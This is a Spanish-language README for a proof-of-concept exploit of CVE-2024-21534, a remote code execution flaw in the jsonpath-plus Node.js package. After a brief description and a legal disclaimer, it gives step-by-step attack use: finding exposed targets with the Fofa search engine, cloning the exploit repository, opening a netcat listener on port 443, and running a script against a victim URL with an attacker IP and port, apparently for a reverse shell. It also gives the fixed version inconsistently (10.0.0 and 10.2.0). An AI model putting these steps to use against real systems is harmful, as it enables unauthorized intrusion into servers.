
POC - CVE-2024-21534 Jsonpath-plus vulnerable a la Ejecución Remota de Código (RCE) debido a una desinfección inadecuada de la entrada.
CVE-2024-21534 es una vulnerabilidad crítica encontrada en versiones del paquete jsonpath-plus anteriores a la versión 10.0.0. La vulnerabilidad se debe a una sanitización inadecuada de la entrada, lo que puede llevar a una Ejecución Remota de Código (RCE) en los sistemas afectados. Esta vulnerabilidad es particularmente peligrosa ya que puede ser explotada sin autenticación, permitiendo a los atacantes ejecutar código arbitrario en el servidor mediante el envío de entrada especialmente diseñada. Este problema surge del uso inseguro por defecto del módulo vm de Node.js, que, si se explota, podría comprometer todo el sistema.
versiones de jsonpath-plus anteriores a la 10.2.0
La vulnerabilidad se encuentra en el paquete jsonpath-plus, que es ampliamente utilizado para consultar estructuras de datos JSON en aplicaciones. El fallo se debe a una sanitización inadecuada de la entrada, permitiendo la ejecución de código malicioso.
Leer sobre ello — CVE-2024-21534
Descargo de responsabilidad: Este Prueba de Concepto (POC) está hecho únicamente con fines educativos y de prueba ética. El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables por cualquier mal uso o daño causado por este programa.
Para encontrar posibles objetivos, use Fofa (similar a Shodan.io):
Jsonpath-plus
Primero, clone el repositorio:
git clone https://github.com/verylazytech/CVE-2024-21534
Ahora abra un listener usando nc:
nc -lnvp 443
Ejecutar el Exploit:
Asegúrese de que la URL apunte a un endpoint que procese la entrada del usuario a través del paquete jsonpath-plus vulnerable, ya que esto permitirá la explotación de la vulnerabilidad RCE.
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

